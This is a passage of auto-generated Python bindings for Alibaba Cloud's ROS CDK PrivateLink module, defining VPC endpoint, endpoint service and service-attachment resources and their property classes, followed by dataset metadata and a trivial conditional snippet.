return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceId: The resource id.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "resourceId"))
@resource_id.setter
def resource_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "resourceId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resourceType")
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceType: The resource type.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "resourceType"))
@resource_type.setter
def resource_type(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "resourceType", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceId")
def service_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "serviceId"))
@service_id.setter
def service_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "serviceId", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointServiceAttachmentProps",
jsii_struct_bases=[],
name_mapping={
"resource_id": "resourceId",
"resource_type": "resourceType",
"service_id": "serviceId",
},
)
class RosVpcEndpointServiceAttachmentProps:
def __init__(
self,
*,
resource_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
resource_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
service_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
'''Properties for defining a ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
:param resource_id:
:param resource_type:
:param service_id:
'''
self._values: typing.Dict[str, typing.Any] = {
"resource_id": resource_id,
"resource_type": resource_type,
"service_id": service_id,
}
@builtins.property
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceId: The resource id.
'''
result = self._values.get("resource_id")
assert result is not None, "Required property 'resource_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceType: The resource type.
'''
result = self._values.get("resource_type")
assert result is not None, "Required property 'resource_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def service_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint.
'''
result = self._values.get("service_id")
assert result is not None, "Required property 'service_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosVpcEndpointServiceAttachmentProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointServiceProps",
jsii_struct_bases=[],
name_mapping={
"auto_accept_enabled": "autoAcceptEnabled",
"connect_bandwidth": "connectBandwidth",
"payer": "payer",
"resource": "resource",
"service_description": "serviceDescription",
"user": "user",
"zone_affinity_enabled": "zoneAffinityEnabled",
},
)
class RosVpcEndpointServiceProps:
def __init__(
self,
*,
auto_accept_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
connect_bandwidth: typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]] = None,
payer: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
resource: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]] = None,
service_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
user: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]] = None,
zone_affinity_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::PrivateLink::VpcEndpointService``.
:param auto_accept_enabled:
:param connect_bandwidth:
:param payer:
:param resource:
:param service_description:
:param user:
:param zone_affinity_enabled:
'''
self._values: typing.Dict[str, typing.Any] = {}
if auto_accept_enabled is not None:
self._values["auto_accept_enabled"] = auto_accept_enabled
if connect_bandwidth is not None:
self._values["connect_bandwidth"] = connect_bandwidth
if payer is not None:
self._values["payer"] = payer
if resource is not None:
self._values["resource"] = resource
if service_description is not None:
self._values["service_description"] = service_description
if user is not None:
self._values["user"] = user
if zone_affinity_enabled is not None:
self._values["zone_affinity_enabled"] = zone_affinity_enabled
@builtins.property
def auto_accept_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests. Valid values:
true: automatically accepts endpoint connection requests.
false: does not automatically accept endpoint connection requests.
'''
result = self._values.get("auto_accept_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
@builtins.property
def connect_bandwidth(
self,
) -> typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]]:
'''
:Property: connectBandwidth: The default maximum bandwidth of the endpoint connection. Valid values: 100 to 1024. Unit: Mbit/s.
'''
result = self._values.get("connect_bandwidth")
return typing.cast(typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]], result)
@builtins.property
def payer(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
payer: The payer of the endpoint service. Valid values:
Endpoint: the service consumer.
EndpointService: the service provider.
'''
result = self._values.get("payer")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def resource(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]]:
'''
:Property: resource:
'''
result = self._values.get("resource")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]], result)
@builtins.property
def service_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceDescription: The description for the endpoint service.
'''
result = self._values.get("service_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def user(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]]:
'''
:Property: user: Account IDs to the whitelist of an endpoint service.
'''
result = self._values.get("user")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]], result)
@builtins.property
def zone_affinity_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone.
true: yes.
false (default): no
'''
result = self._values.get("zone_affinity_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosVpcEndpointServiceProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class VpcEndpoint(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpoint",
):
'''A ROS resource type: ``ALIYUN::PrivateLink::VpcEndpoint``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "VpcEndpointProps",
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpoint``.
Param scope - scope in which this resource is defined
Param id - scoped id of the resource
Param props - resource properties
:param scope: -
:param id: -
:param props: -
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrBandwidth")
def attr_bandwidth(self) -> ros_cdk_core.IResolvable:
'''Attribute Bandwidth: The bandwidth of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointDomain")
def attr_endpoint_domain(self) -> ros_cdk_core.IResolvable:
'''Attribute EndpointDomain: The domain name of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointId")
def attr_endpoint_id(self) -> ros_cdk_core.IResolvable:
'''Attribute EndpointId: The ID of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointName")
def attr_endpoint_name(self) -> ros_cdk_core.IResolvable:
'''Attribute EndpointName: The name of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceId: The ID of endpoint service that is associated with the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceName: The name of endpoint service that is associated with the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrVpcId")
def attr_vpc_id(self) -> ros_cdk_core.IResolvable:
'''Attribute VpcId: The vpc ID of endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrVpcId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrZoneDomains")
def attr_zone_domains(self) -> ros_cdk_core.IResolvable:
'''Attribute ZoneDomains: The zone domains.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrZoneDomains"))
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointProps",
jsii_struct_bases=[],
name_mapping={
"security_group_id": "securityGroupId",
"vpc_id": "vpcId",
"endpoint_description": "endpointDescription",
"endpoint_name": "endpointName",
"service_id": "serviceId",
"service_name": "serviceName",
"zone": "zone",
},
)
class VpcEndpointProps:
def __init__(
self,
*,
security_group_id: typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]],
vpc_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
endpoint_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
endpoint_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
zone: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::PrivateLink::VpcEndpoint``.
:param security_group_id: Property securityGroupId: The security group associated with the endpoint network interface. The security group can control the data communication from the VPC to the endpoint network interface.
:param vpc_id: Property vpcId: The VPC to which the endpoint belongs.
:param endpoint_description: Property endpointDescription: The description of the endpoint. The description must be 2 to 256 characters in length and cannot start with http:// or https://.
:param endpoint_name: Property endpointName: The name of the endpoint. The name must be 2 to 128 characters in length and can contain digits, underscores (_), and hyphens (-). The name must start with a letter.
:param service_id: Property serviceId: The endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
:param service_name: Property serviceName: The name of the endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
:param zone: Property zone:.
'''
self._values: typing.Dict[str, typing.Any] = {
"security_group_id": security_group_id,
"vpc_id": vpc_id,
}
if endpoint_description is not None:
self._values["endpoint_description"] = endpoint_description
if endpoint_name is not None:
self._values["endpoint_name"] = endpoint_name
if service_id is not None:
self._values["service_id"] = service_id
if service_name is not None:
self._values["service_name"] = service_name
if zone is not None:
self._values["zone"] = zone
@builtins.property
def security_group_id(
self,
) -> typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]:
'''Property securityGroupId: The security group associated with the endpoint network interface.
The security group can control the data communication from the VPC to the endpoint network interface.
'''
result = self._values.get("security_group_id")
assert result is not None, "Required property 'security_group_id' is missing"
return typing.cast(typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]], result)
@builtins.property
def vpc_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property vpcId: The VPC to which the endpoint belongs.'''
result = self._values.get("vpc_id")
assert result is not None, "Required property 'vpc_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def endpoint_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property endpointDescription: The description of the endpoint.
The description must be 2 to 256 characters in length and cannot start with http:// or https://.
'''
result = self._values.get("endpoint_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def endpoint_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property endpointName: The name of the endpoint.
The name must be 2 to 128 characters in length and can contain digits, underscores
(_), and hyphens (-). The name must start with a letter.
'''
result = self._values.get("endpoint_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property serviceId: The endpoint service that is associated with the endpoint.
One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property serviceName: The name of the endpoint service that is associated with the endpoint.
One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def zone(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]]:
'''Property zone:.'''
result = self._values.get("zone")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class VpcEndpointService(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointService",
):
'''A ROS resource type: ``ALIYUN::PrivateLink::VpcEndpointService``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: typing.Optional["VpcEndpointServiceProps"] = None,
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointService``.
Param scope - scope in which this resource is defined
Param id - scoped id of the resource
Param props - resource properties
:param scope: -
:param id: -
:param props: -
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMaxBandwidth")
def attr_max_bandwidth(self) -> ros_cdk_core.IResolvable:
'''Attribute MaxBandwidth: The maximum bandwidth of the endpoint connection.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMaxBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMinBandwidth")
def attr_min_bandwidth(self) -> ros_cdk_core.IResolvable:
'''Attribute MinBandwidth: The minimum bandwidth of the endpoint connection.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMinBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDescription")
def attr_service_description(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceDescription: The description of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDescription"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDomain")
def attr_service_domain(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceDomain: The domain name of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceId: The ID of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceName: The name of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
class VpcEndpointServiceAttachment(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointServiceAttachment",
):
'''A ROS resource type: ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "VpcEndpointServiceAttachmentProps",
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
Param scope - scope in which this resource is defined
Param id - scoped id of the resource
Param props - resource properties
:param scope: -
:param id: -
:param props: -
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceId")
def attr_resource_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ResourceId: The resource id.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceType")
def attr_resource_type(self) -> ros_cdk_core.IResolvable:
'''Attribute ResourceType: The resource type.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceType"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceId: The endpoint service that is associated with the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointServiceAttachmentProps",
jsii_struct_bases=[],
name_mapping={
"resource_id": "resourceId",
"resource_type": "resourceType",
"service_id": "serviceId",
},
)
class VpcEndpointServiceAttachmentProps:
def __init__(
self,
*,
resource_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
resource_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
service_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
'''Properties for defining a ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
:param resource_id: Property resourceId: The resource id.
:param resource_type: Property resourceType: The resource type.
:param service_id: Property serviceId: The endpoint service that is associated with the endpoint.
'''
self._values: typing.Dict[str, typing.Any] = {
"resource_id": resource_id,
"resource_type": resource_type,
"service_id": service_id,
}
@builtins.property
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property resourceId: The resource id.'''
result = self._values.get("resource_id")
assert result is not None, "Required property 'resource_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property resourceType: The resource type.'''
result = self._values.get("resource_type")
assert result is not None, "Required property 'resource_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def service_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property serviceId: The endpoint service that is associated with the endpoint.'''
result = self._values.get("service_id")
assert result is not None, "Required property 'service_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointServiceAttachmentProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointServiceProps",
jsii_struct_bases=[],
name_mapping={
"auto_accept_enabled": "autoAcceptEnabled",
"connect_bandwidth": "connectBandwidth",
"payer": "payer",
"resource": "resource",
"service_description": "serviceDescription",
"user": "user",
"zone_affinity_enabled": "zoneAffinityEnabled",
},
)
class VpcEndpointServiceProps:
def __init__(
self,
*,
auto_accept_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
connect_bandwidth: typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]] = None,
payer: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
resource: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]] = None,
service_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
user: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]] = None,
zone_affinity_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::PrivateLink::VpcEndpointService``.
:param auto_accept_enabled: Property autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests. Valid values: true: automatically accepts endpoint connection requests. false: does not automatically accept endpoint connection requests.
:param connect_bandwidth: Property connectBandwidth: The default maximum bandwidth of the endpoint connection. Valid values: 100 to 1024. Unit: Mbit/s.
:param payer: Property payer: The payer of the endpoint service. Valid values: Endpoint: the service consumer. EndpointService: the service provider.
:param resource: Property resource:.
:param service_description: Property serviceDescription: The description for the endpoint service.
:param user: Property user: Account IDs to the whitelist of an endpoint service.
:param zone_affinity_enabled: Property zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone. true: yes. false (default): no
'''
self._values: typing.Dict[str, typing.Any] = {}
if auto_accept_enabled is not None:
self._values["auto_accept_enabled"] = auto_accept_enabled
if connect_bandwidth is not None:
self._values["connect_bandwidth"] = connect_bandwidth
if payer is not None:
self._values["payer"] = payer
if resource is not None:
self._values["resource"] = resource
if service_description is not None:
self._values["service_description"] = service_description
if user is not None:
self._values["user"] = user
if zone_affinity_enabled is not None:
self._values["zone_affinity_enabled"] = zone_affinity_enabled
@builtins.property
def auto_accept_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''Property autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests.
Valid values:
true: automatically accepts endpoint connection requests.
false: does not automatically accept endpoint connection requests.
'''
result = self._values.get("auto_accept_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
@builtins.property
def connect_bandwidth(
self,
) -> typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]]:
'''Property connectBandwidth: The default maximum bandwidth of the endpoint connection.
Valid values: 100 to 1024. Unit: Mbit/s.
'''
result = self._values.get("connect_bandwidth")
return typing.cast(typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]], result)
@builtins.property
def payer(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property payer: The payer of the endpoint service.
Valid values:
Endpoint: the service consumer.
EndpointService: the service provider.
'''
result = self._values.get("payer")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def resource(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]]:
'''Property resource:.'''
result = self._values.get("resource")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]], result)
@builtins.property
def service_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property serviceDescription: The description for the endpoint service.'''
result = self._values.get("service_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def user(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]]:
'''Property user: Account IDs to the whitelist of an endpoint service.'''
result = self._values.get("user")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]], result)
@builtins.property
def zone_affinity_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''Property zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone.
true: yes.
false (default): no
'''
result = self._values.get("zone_affinity_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointServiceProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"RosVpcEndpoint",
"RosVpcEndpointProps",
"RosVpcEndpointService",
"RosVpcEndpointServiceAttachment",
"RosVpcEndpointServiceAttachmentProps",
"RosVpcEndpointServiceProps",
"VpcEndpoint",
"VpcEndpointProps",
"VpcEndpointService",
"VpcEndpointServiceAttachment",
"VpcEndpointServiceAttachmentProps",
"VpcEndpointServiceProps",
]
publication.publish()
| 43.092081
| 274
| 0.676012
| 8,052
| 70,197
| 5.703428
| 0.031545
| 0.039326
| 0.062059
| 0.124379
| 0.929754
| 0.923896
| 0.921806
| 0.91769
| 0.915273
| 0.912137
| 0
| 0.001082
| 0.210351
| 70,197
| 1,628
| 275
| 43.11855
| 0.827407
| 0.211604
| 0
| 0.829268
| 0
| 0
| 0.119711
| 0.039369
| 0
| 0
| 0
| 0
| 0.014634
| 1
| 0.156098
| false
| 0
| 0.009756
| 0.029268
| 0.302439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d75e8cdda844a126d86e5391f5a06866ab1c9dba
| 76
|
py
|
Python
|
tests/logical/OR.py
|
past-one/rubymine-is2018
|
9b7f38bbcab0b59434e074632e9e2fb9dbd56d29
|
[
"Apache-2.0"
] | null | null | null |
tests/logical/OR.py
|
past-one/rubymine-is2018
|
9b7f38bbcab0b59434e074632e9e2fb9dbd56d29
|
[
"Apache-2.0"
] | null | null | null |
tests/logical/OR.py
|
past-one/rubymine-is2018
|
9b7f38bbcab0b59434e074632e9e2fb9dbd56d29
|
[
"Apache-2.0"
] | null | null | null |
if 3 > 4 or 5 < 10: # true
pass
if 3 > 4 or 5 > 10: # false
pass
| 12.666667
| 28
| 0.460526
| 16
| 76
| 2.1875
| 0.5625
| 0.171429
| 0.228571
| 0.342857
| 0.514286
| 0.514286
| 0
| 0
| 0
| 0
| 0
| 0.232558
| 0.434211
| 76
| 5
| 29
| 15.2
| 0.581395
| 0.131579
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
